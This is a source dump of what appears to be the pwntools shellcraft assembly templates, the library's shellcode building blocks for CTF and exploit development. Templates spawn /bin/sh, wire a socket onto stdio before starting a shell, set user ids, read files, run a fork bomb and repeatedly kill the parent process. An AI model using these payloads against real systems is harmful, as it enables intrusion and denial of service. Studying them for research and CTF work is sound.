pwnlib.shellcraft.amd64 import mov, linux %> 3 | <%page args="ruid=None, euid=None, suid=None"/> 4 | <%docstring> 5 | Args: [ruid = geteuid(), euid = ruid, suid = ruid] 6 | Sets real, effective and saved user ids to given values 7 | 8 | 9 | %if ruid is None: 10 | ${linux.geteuid()} 11 | <% ruid = 'eax' %> 12 | %endif 13 | <% 14 | if euid is None: euid = ruid 15 | if suid is None: suid = ruid 16 | %> 17 | 18 | ${linux.syscalls.setresuid(ruid, euid, suid)} 19 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/setreuid.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import amd64 %> 2 | <%page args="uid = 'euid'"/> 3 | <%docstring> 4 | Args: [uid (imm/reg) = euid] 5 | Sets the real and effective user id. 6 | 7 | 8 | % if uid == 'euid': 9 | /* geteuid */ 10 | ${amd64.linux.syscall('SYS_geteuid')} 11 | ${amd64.mov('rdi', 'rax')} 12 | % else: 13 | ${amd64.mov('rdi', uid)} 14 | % endif 15 | 16 | ${amd64.linux.syscall('SYS_setreuid', 'rdi', 'rdi')} 17 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/sh.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import amd64 %> 2 | <%docstring> 3 | Execute a different process. 4 | 5 | >>> p = run_assembly(shellcraft.amd64.linux.sh()) 6 | >>> p.sendline(b'echo Hello') 7 | >>> p.recv() 8 | b'Hello\n' 9 | 10 | 11 | ${amd64.linux.execve('/bin///sh', ['sh'], 0)} 12 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/sleep.asm: -------------------------------------------------------------------------------- 1 | ../../common/linux/sleep.asm -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/syscalls: -------------------------------------------------------------------------------- 1 | ../../common/linux/syscalls -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/memcpy.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import amd64, pretty %> 2 | <%docstring>Copies memory. 3 | 4 | Args: 5 | dest: Destination address 6 | src: Source address 7 | n: Number of bytes 8 | 9 | <%page args="dest, src, n"/> 10 | /* memcpy(${pretty(dest)}, ${pretty(src)}, ${pretty(n)}) */ 11 | cld 12 | ${amd64.setregs({'rdi': dest, 'rsi': src, 'rcx': n})} 13 | rep movsb 14 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/nop.asm: -------------------------------------------------------------------------------- 1 | <%docstring>A single-byte nop instruction. 2 | nop 3 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/popad.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import amd64 %> 2 | <%docstring> 3 | Pop all of the registers onto the stack which i386 popad does, 4 | in the same order. 5 | 6 | pop rdi 7 | pop rsi 8 | pop rbp 9 | pop rbx /* add rsp, 8 */ 10 | pop rbx 11 | pop rdx 12 | pop rcx 13 | pop rax 14 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/pushad.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import amd64 %> 2 | <%docstring> 3 | Push all of the registers onto the stack which i386 pushad does, 4 | in the same order. 5 | 6 | push rax 7 | push rcx 8 | push rdx 9 | push rbp 10 | push rsp 11 | push rbp 12 | push rsi 13 | push rdi 14 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/ret.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import amd64 %> 2 | <%docstring>A single-byte RET instruction. 3 | 4 | Args: 5 | return_value: Value to return 6 | 7 | <%page args="return_value = None"/> 8 | 9 | % if return_value is not None: 10 | ${amd64.mov('rax', return_value)} 11 | % endif 12 | 13 | ret 14 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/trap.asm: -------------------------------------------------------------------------------- 1 | <%docstring>A trap instruction. 2 | int3 3 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/windows/__doc__: -------------------------------------------------------------------------------- 1 | Shellcraft module containing Intel x86_64 shellcodes for Windows. 2 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/windows/cmd.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft import amd64 3 | %> 4 | <%docstring>Execute cmd.exe and keep the parent process 5 | in an infinite loop. 6 | 7 | 8 | ${amd64.windows.winexec(b'cmd.exe')} 9 | ${amd64.infloop()} 10 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/windows/kernel32base.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import amd64 %> 2 | <%docstring>Find the base address of kernel32.dll in memory. 3 | 4 | Args: 5 | dest (str): The register to load the kernel32.dll base address into. 6 | 7 | <%page args="dest='rax'"/> 8 | ## The loaded list of modules always starts with 9 | ## 1. the executable itself 10 | ## 2. ntdll.dll 11 | ## 3. kernel32.dll 12 | ${amd64.windows.peb(dest)} 13 | mov ${dest}, [${dest} + 0x18] /* PEB->Ldr */ 14 | mov rsi, [${dest} + 0x20] /* PEB->Ldr.InMemOrder LIST_ENTRY */ 15 | lodsq 16 | xchg rax, rsi 17 | lodsq 18 | mov ${dest}, [rax + 0x20] /* LDR_DATA_TABLE_ENTRY->DllBase */ -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/windows/ntdllbase.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import amd64 %> 2 | <%docstring>Find the base address of ntdll.dll in memory. 3 | 4 | Args: 5 | dest (str): The register to load the ntdll.dll base address into. 6 | 7 | <%page args="dest='rax'"/> 8 | ## The loaded list of modules always starts with: 9 | ## 1. the executable itself 10 | ## 2. ntdll.dll 11 | ## 3. kernel32.dll 12 | ${amd64.windows.peb(dest)} 13 | mov ${dest}, [${dest} + 0x18] /* PEB->Ldr */ 14 | mov rsi, [${dest} + 0x20] /* PEB->Ldr.InMemOrder LIST_ENTRY */ 15 | lodsq 16 | mov ${dest}, [rax + 0x20] /* LDR_DATA_TABLE_ENTRY->DllBase */ 17 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/windows/peb.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import amd64 %> 2 | <%docstring>Loads the Process Environment Block (PEB) into the target register. 3 | 4 | Args: 5 | dest (str): The register to load the PEB into. 6 | 7 | <%page args="dest='rax'"/> 8 | ${amd64.windows.teb(dest, 0x60)} 9 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/windows/teb.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.log import getLogger 3 | from pwnlib.shellcraft import pretty 4 | from pwnlib.shellcraft.registers import get_register, is_register 5 | log = getLogger('pwnlib.shellcraft.amd64.teb') 6 | %> 7 | <%page args="dest='rax', offset=0"/> 8 | <%docstring>Loads the Thread Environment Block (TEB) into the target register. 9 | 10 | Args: 11 | dest (str): The register to load the TEB into. 12 | offset (int): The offset from the TEB to load. 13 | 14 | <% 15 | if not is_register(dest): 16 | log.error('%r is not a register' % dest) 17 | 18 | dest = get_register(dest) 19 | %> 20 | xor esi, esi 21 | mov ${dest}, qword ptr gs:[rsi+${pretty(offset)}] 22 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/__doc__: -------------------------------------------------------------------------------- 1 | Shellcraft module containing generic ARM little endian shellcodes. 2 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/android: -------------------------------------------------------------------------------- 1 | linux -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/crash.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft.arm import mov %> 2 | <%docstring> 3 | Crash. 4 | 5 | Example: 6 | 7 | >>> run_assembly(shellcraft.crash()).poll(True) 8 | -11 9 | 10 | pop {r0-r12,lr} 11 | ${mov('sp', 0)} 12 | add pc, sp, #0 13 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/freebsd/__doc__: -------------------------------------------------------------------------------- 1 | Shellcraft module containing ARM shellcodes for FreeBSD. 2 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/infloop.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <%docstring>An infinite loop. 3 | <% infloop = common.label("infloop") %> 4 | ${infloop}: 5 | b ${infloop} 6 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/linux/__doc__: -------------------------------------------------------------------------------- 1 | Shellcraft module containing ARM shellcodes for Linux. 2 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/linux/cat.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib import constants 3 | from pwnlib.shellcraft import arm 4 | %> 5 | <%page args="filename, fd=1"/> 6 | <%docstring> 7 | Opens a file and writes its contents to the specified file descriptor. 8 | 9 | Example: 10 | 11 | >>> f = tempfile.mktemp() 12 | >>> write(f, 'FLAG\n') 13 | >>> run_assembly(shellcraft.arm.linux.cat(f)).recvline() 14 | b'FLAG\n' 15 | 16 | 17 | ${arm.pushstr(filename)} 18 | ${arm.linux.open('sp', int(constants.O_RDONLY), 'r2')} 19 | ${arm.linux.sendfile(fd, 'r0', 0, 0x7fffffff)} 20 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/linux/cat2.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib import constants 3 | from pwnlib.shellcraft import arm 4 | %> 5 | <%page args="filename, fd=1, length=0x4000"/> 6 | <%docstring> 7 | Opens a file and writes its contents to the specified file descriptor. 8 | Uses an extra stack buffer and must know the length. 9 | 10 | Example: 11 | 12 | >>> f = tempfile.mktemp() 13 | >>> write(f, 'FLAG\n') 14 | >>> run_assembly(shellcraft.arm.linux.cat2(f)).recvline() 15 | b'FLAG\n' 16 | 17 | 18 | ${arm.pushstr(filename)} 19 | ${arm.linux.open('sp', int(constants.O_RDONLY), length)} 20 | sub sp, r2 21 | ${arm.linux.read('r0', 'sp', 'r2')} 22 | ${arm.linux.write(fd, 'sp', 'r0')} 23 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/linux/dir.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import arm, pretty, common %> 2 | <%page args="in_fd = 'r6', size = 0x800, allocate_stack = True"/> 3 | <%docstring> Reads to the stack from a directory. 4 | 5 | Args: 6 | in_fd (int/str): File descriptor to be read from. 7 | size (int): Buffer size. 8 | allocate_stack (bool): allocate 'size' bytes on the stack. 9 | 10 | You can optioanlly shave a few bytes not allocating the stack space. 11 | 12 | The size read is left in eax. 13 | 14 | <% 15 | getdents_loop = common.label('getdents_loop') 16 | %> 17 | %if allocate_stack: 18 | sub sp, sp, ${pretty(size)} 19 | %endif 20 | ${getdents_loop}: 21 | ${arm.linux.getdents(in_fd, 'sp', size)} 22 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/linux/dupio.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <% from pwnlib.shellcraft.arm import mov %> 3 | <%page args="sock = 'r6'"/> 4 | <%docstring> 5 | Args: [sock (imm/reg) = r6] 6 | Duplicates sock to stdin, stdout and stderr 7 | 8 | <% 9 | looplabel = common.label("loop") 10 | %> 11 | /* dup() file descriptor ${sock} into stdin/stdout/stderr */ 12 | ${mov('r1', 2)} 13 | ${mov('r7', 'SYS_dup2')} 14 | 15 | ${looplabel}: 16 | ${mov('r0', sock)} 17 | svc 0 18 | subs r1, #1 19 | bpl ${looplabel} 20 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/linux/dupsh.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft.arm import linux %> 2 | <%page args="sock = 'r6'"/> 3 | <%docstring> 4 | Args: [sock (imm/reg) = r6] 5 | Duplicates sock to stdin, stdout and stderr and spawns a shell. 6 | 7 | 8 | 9 | ${linux.dupio(sock)} 10 | 11 | ${linux.sh()} 12 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/linux/echo.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import arm %> 2 | <%page args="string, sock = '1'"/> 3 | <%docstring> 4 | Writes a string to a file descriptor 5 | 6 | Example: 7 | 8 | >>> run_assembly(shellcraft.echo('hello\n', 1)).recvline() 9 | b'hello\n' 10 | 11 | 12 | 13 | ${arm.pushstr(string, append_null = False)} 14 | ${arm.linux.syscall('SYS_write', sock, 'sp', len(string))} 15 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/linux/forkbomb.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.arm.linux import fork 3 | from pwnlib.shellcraft.common import label 4 | %> 5 | <%docstring> 6 | Performs a forkbomb attack. 7 | 8 | <% 9 | dosloop = label('fork_bomb') 10 | %> 11 | ${dosloop}: 12 | ${fork()} 13 | b ${dosloop} 14 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/linux/forkexit.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft import common 3 | from pwnlib.shellcraft.arm.linux import fork, exit 4 | %> 5 | <%page args=""/> 6 | <%docstring> 7 | Attempts to fork. If the fork is successful, the parent exits. 8 | 9 | <% 10 | dont_exit = common.label('forkexit') 11 | %> 12 | ${fork()} 13 | cmp r0, 1 14 | blt ${dont_exit} 15 | ${exit(0)} 16 | ${dont_exit}: 17 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/linux/kill.asm: -------------------------------------------------------------------------------- 1 | ../../common/linux/kill.asm -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/linux/killparent.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.arm.linux import getppid, kill 3 | from pwnlib.shellcraft.common import label 4 | %> 5 | <%docstring> 6 | Kills its parent process until whatever the parent is (probably init) 7 | cannot be killed any longer. 8 | 9 | <% 10 | killparent_loop = label('killparent') 11 | %> 12 | ${killparent_loop}: 13 | ${getppid()} 14 | ${kill('r0')} 15 | cmp r0, r0 16 | beq ${killparent_loop} 17 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/linux/setresuid.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <% from pwnlib.shellcraft.arm import mov, linux %> 3 | <%page args="ruid=None, euid=None, suid=None"/> 4 | <%docstring> 5 | Args: [ruid = geteuid(), euid = ruid, suid = ruid] 6 | Sets real, effective and saved user ids to given values 7 | 8 | 9 | %if ruid is None: 10 | ${linux.geteuid()} 11 | <% ruid = 'r0' %> 12 | %endif 13 | <% 14 | if euid is None: euid = ruid 15 | if suid is None: suid = ruid 16 | %> 17 | 18 | ${linux.syscalls.setresuid(ruid, euid, suid)} 19 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/linux/sh.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import arm %> 2 | <%docstring> 3 | Execute a different process. 4 | 5 | >>> p = run_assembly(shellcraft.arm.linux.sh()) 6 | >>> p.sendline(b'echo Hello') 7 | >>> p.recv() 8 | b'Hello\n' 9 | 10 | 11 | ${arm.linux.execve('/bin///sh', ['sh'], 0)} 12 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/linux/sleep.asm: -------------------------------------------------------------------------------- 1 | ../../common/linux/sleep.asm -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/linux/syscalls: -------------------------------------------------------------------------------- 1 | ../../common/linux/syscalls -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/memcpy.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import arm, pretty, common %> 2 | <%docstring>Copies memory. 3 | 4 | Args: 5 | dest: Destination address 6 | src: Source address 7 | n: Number of bytes 8 | 9 | <%page args="dest, src, n"/> 10 | <% 11 | memcpy_loop = common.label("memcpy_loop") 12 | %> 13 | /* memcpy(${pretty(dest)}, ${pretty(src)}, ${pretty(n)}) */ 14 | ${arm.setregs({'r0': dest, 'r1': src, 'r2': n})} 15 | ${memcpy_loop}: 16 | ldrb r3, [r1], #1 17 | strb r3, [r0], #1 18 | subs r2, r2, #1 19 | bgt ${memcpy_loop} 20 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/nop.asm: -------------------------------------------------------------------------------- 1 | <%docstring>A nop instruction. 2 | orr r1, r1, r1 3 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/push.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib import constants %> 2 | <% from pwnlib.util import lists, packing, fiddling %> 3 | <% from pwnlib.shellcraft.arm import mov %> 4 | <%page args="word, register='r12'"/> 5 | <%docstring> 6 | Pushes a 32-bit integer onto the stack. Uses r12 as a temporary register. 7 | 8 | r12 is defined as the inter-procedural scartch register ($ip), 9 | so this should not interfere with most usage. 10 | 11 | Args: 12 | word (int, str): 13 | The word to push 14 | tmpreg (str): 15 | Register to use as a temporary register. R7 is used by default. 16 | 17 | 18 | ${mov(register,word)} 19 | push {${register}} 20 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/ret.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import arm %> 2 | <%docstring>A single-byte RET instruction. 3 | 4 | Args: 5 | return_value: Value to return 6 | 7 | Examples: 8 | 9 | >>> with context.local(arch='arm'): 10 | ... print(enhex(asm(shellcraft.ret()))) 11 | ... print(enhex(asm(shellcraft.ret(0)))) 12 | ... print(enhex(asm(shellcraft.ret(0xdeadbeef)))) 13 | 1eff2fe1 14 | 000020e01eff2fe1 15 | ef0e0be3ad0e4de31eff2fe1 16 | 17 | <%page args="return_value = None"/> 18 | 19 | % if return_value is not None: 20 | ${arm.mov('r0', return_value)} 21 | % endif 22 | 23 | bx lr 24 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/to_thumb.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from random import choice 3 | from pwnlib.shellcraft import registers 4 | %> 5 | <%docstring>Go from ARM to THUMB mode. 6 | <%page args="reg=None, avoid = []"/> 7 | <% 8 | if reg: 9 | pass 10 | elif not avoid or 'r3' not in avoid: 11 | reg = 'r3' 12 | else: 13 | # Avoid registers we don't want to clobber, and r0 14 | # since it will encode a NULL. 15 | avoid = set(avoid) | {'r0', 'sp', 'pc', 'cpsr', 'lr'} 16 | reg = next(r for r in registers.arm if r not in avoid) 17 | %> 18 | .arm 19 | add ${reg}, pc, #1 20 | bx ${reg} 21 | .thumb 22 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/trap.asm: -------------------------------------------------------------------------------- 1 | <%docstring>A trap instruction. 2 | BKPT 3 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/arm/udiv_10.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft import common 3 | from pwnlib.shellcraft import arm 4 | %> 5 | <%page args="N"/> 6 | <%docstring> 7 | Divides r0 by 10. Result is stored in r0, N and Z flags are updated. 8 | 9 | Code is from generated from here: 10 | https://raw.githubusercontent.com/rofirrim/raspberry-pi-assembler/master/chapter15/magic.py 11 | 12 | With code: 13 | python magic.py 10 code_for_unsigned 14 | 15 | /* r0 = ${N} / 10 */ 16 | ${arm.setregs({'r0': N, 'r1': 0xcccccccd})} 17 | umull r1, r2, r1, r0 /* r1 <- Lower32Bits(r1*r0). r2 <- Upper32Bits(r1*r0) */ 18 | movs r0, r2, LSR #3 /* r0 <- r2 >> 3 */ 19 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/common/__doc__: -------------------------------------------------------------------------------- 1 | Shellcraft module containing shellcode common to all platforms. 2 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/common/freebsd/__doc__: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/shellcraft/templates/common/freebsd/__doc__ -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/common/label.asm: -------------------------------------------------------------------------------- 1 | <%page args="prefix = 'label'"/> 2 | <%docstring> 3 | Returns a new unique label with a given prefix. 4 | 5 | Args: 6 | prefix (str): The string to prefix the label with 7 | 8 | <%! 9 | label_num = 0 10 | %> 11 | <% 12 | global label_num 13 | label_num += 1 14 | %> 15 | ${prefix}_${label_num} 16 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/common/linux/__doc__: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/shellcraft/templates/common/linux/__doc__ -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/common/linux/kill.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib import shellcraft %> 2 | <%page args="pid, signal = 'SIGKILL'"/> 3 | <%docstring>kill(pid, sig) -> str 4 | 5 | Invokes the syscall kill. 6 | 7 | See 'man 2 kill' for more information. 8 | 9 | Arguments: 10 | pid(pid_t): pid 11 | sig(int): sig 12 | Returns: 13 | int 14 | 15 | 16 | ${shellcraft.linux.syscall('SYS_kill', pid, signal)} 17 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/common/linux/syscalls/__doc__: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/shellcraft/templates/common/linux/syscalls/__doc__ -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/__doc__: -------------------------------------------------------------------------------- 1 | Shellcraft module containing generic Intel i386 shellcodes. 2 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/android: -------------------------------------------------------------------------------- 1 | linux -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/breakpoint.asm: -------------------------------------------------------------------------------- 1 | <%docstring>A single-byte breakpoint instruction. 2 | int3 3 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/cgc/__doc__: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/shellcraft/templates/i386/cgc/__doc__ -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/cgc/allocate.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.i386.cgc import syscall 3 | %> 4 | <%page args="length, is_X, addr"/> 5 | <%docstring> 6 | Invokes the syscall allocate. 7 | 8 | For more information, see: 9 | https://github.com/CyberGrandChallenge/libcgc/blob/master/allocate.md 10 | 11 | Arguments: 12 | length(int): length 13 | is_X(int): is_X 14 | addr(int): addr 15 | 16 | 17 | ${syscall('SYS_allocate', length, is_X, addr)} 18 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/cgc/cat.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.i386.cgc import syscall 3 | %> 4 | <%page args="length, is_X, addr"/> 5 | <%docstring> 6 | Invokes the syscall allocate. 7 | 8 | For more information, see: 9 | https://github.com/CyberGrandChallenge/libcgc/blob/master/allocate.md 10 | 11 | Arguments: 12 | length(int): length 13 | is_X(int): is_X 14 | addr(int): addr 15 | 16 | 17 | ${syscall('SYS_allocate', length, is_X, addr)} 18 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/cgc/deallocate.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.i386.cgc import syscall 3 | %> 4 | <%page args="addr, length"/> 5 | <%docstring> 6 | Invokes the syscall deallocate. 7 | 8 | For more information, see: 9 | https://github.com/CyberGrandChallenge/libcgc/blob/master/deallocate.md 10 | 11 | Arguments: 12 | addr(int): addr 13 | length(int): length 14 | 15 | 16 | ${syscall('SYS_deallocate', addr, length)} 17 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/cgc/fdwait.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.i386.cgc import syscall 3 | %> 4 | <%page args="nfds, readfds, writefds, timeout, readyfds"/> 5 | <%docstring> 6 | Invokes the syscall fdwait. 7 | 8 | For more information, see: 9 | https://github.com/CyberGrandChallenge/libcgc/blob/master/fdwait.md 10 | 11 | Arguments: 12 | nfds(int): nfds 13 | readfds(int): readfds 14 | writefds(int): writefds 15 | timeout(int): timeout 16 | readyfds(int): readyfds 17 | 18 | 19 | ${syscall('SYS_fdwait', nfds, readfds, writefds, timeout, readyfds)} 20 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/cgc/random.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.i386.cgc import syscall 3 | %> 4 | <%page args="buf, count, rnd_bytes"/> 5 | <%docstring> 6 | Invokes the syscall random. 7 | 8 | For more information, see: 9 | https://github.com/CyberGrandChallenge/libcgc/blob/master/random.md 10 | 11 | Arguments: 12 | buf(int): buf 13 | count(int): count 14 | rnd_bytes(int): rnd_bytes 15 | 16 | 17 | ${syscall('SYS_random', buf, count, rnd_bytes)} 18 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/cgc/receive.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.i386.cgc import syscall 3 | %> 4 | <%page args="fd, buf, count, bytes"/> 5 | <%docstring> 6 | Invokes the syscall receive. 7 | 8 | For more information, see: 9 | https://github.com/CyberGrandChallenge/libcgc/blob/master/receive.md 10 | 11 | Arguments: 12 | fd(int): fd 13 | buf(int): buf 14 | count(int): count 15 | bytes(int): bytes 16 | 17 | 18 | ${syscall('SYS_receive', fd, buf, count, bytes)} 19 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/cgc/terminate.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.i386.cgc import syscall 3 | %> 4 | <%page args="status"/> 5 | <%docstring> 6 | Invokes the syscall terminate. 7 | 8 | For more information, see: 9 | https://github.com/CyberGrandChallenge/libcgc/blob/master/_terminate.md 10 | 11 | Arguments: 12 | status(int): status 13 | 14 | 15 | ${syscall('SYS_terminate', status)} 16 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/cgc/transmit.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.i386.cgc import syscall 3 | %> 4 | <%page args="fd, buf, count, tx_bytes"/> 5 | <%docstring> 6 | Invokes the syscall transmit. 7 | 8 | For more information, see: 9 | https://github.com/CyberGrandChallenge/libcgc/blob/master/transmit.md 10 | 11 | Arguments: 12 | fd(int): fd 13 | buf(int): buf 14 | count(int): count 15 | tx_bytes(int): tx_bytes 16 | 17 | 18 | ${syscall('SYS_transmit', fd, buf, count, tx_bytes)} 19 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/crash.asm: -------------------------------------------------------------------------------- 1 | <%docstring> 2 | Crash. 3 | 4 | Example: 5 | 6 | >>> run_assembly(shellcraft.crash()).poll(True) 7 | -11 8 | 9 | popad /* fill all registers with shit */ 10 | xor esp, esp /* especially esp */ 11 | jmp esp /* boom */ 12 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/epilog.asm: -------------------------------------------------------------------------------- 1 | <%page args="nargs=0"/> 2 | <%docstring> 3 | Function epilogue. 4 | 5 | Arguments: 6 | nargs(int): Number of arguments to pop off the stack. 7 | 8 | 9 | leave 10 | %if nargs: 11 | ret ${nargs}*4 12 | %else: 13 | ret 14 | %endif 15 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/freebsd/__doc__: -------------------------------------------------------------------------------- 1 | Shellcraft module containing Intel i386 shellcodes for FreeBSD. 2 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/freebsd/i386_to_amd64.asm: -------------------------------------------------------------------------------- 1 | <%docstring>Returns code to switch from i386 to amd64 mode. Trashes eax. 2 | .code32 3 | push 0x43 /* This is the segment we want to go to */ 4 | /* "db 0xff; sub al,0x24" is "jmp far [esp]" by chance */ 5 | call $+4 6 | sub al, 0x24 7 | .code64 8 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/freebsd/sh.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import i386 %> 2 | <%docstring> 3 | Execute /bin/sh 4 | 5 | 6 | 7 | /* Clear eax, ecx, edx */ 8 | xor eax, eax 9 | push eax 10 | 11 | /* Push '/bin//sh' */ 12 | ${i386.pushstr("/bin//sh")} 13 | mov ecx, esp 14 | 15 | /* execve("/bin//sh", {junk, 0}, {0}); */ 16 | push eax 17 | push esp 18 | push esp 19 | push ecx 20 | push eax 21 | mov al, SYS_execve 22 | int 0x80 23 | 24 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/getpc.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import i386 %> 2 | <%docstring>Retrieves the value of EIP, stores it in the desired register. 3 | 4 | Args: 5 | return_value: Value to return 6 | 7 | <%page args="register = 'ecx'"/> 8 | 9 | call INC_EBX 10 | .equ INC_EBX, $-1 11 | ret 12 | pop ${register} 13 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/infloop.asm: -------------------------------------------------------------------------------- 1 | <%docstring>A two-byte infinite loop. 2 | jmp $ 3 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/__doc__: -------------------------------------------------------------------------------- 1 | Shellcraft module containing Intel i386 shellcodes for Linux. 2 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/cat.asm: 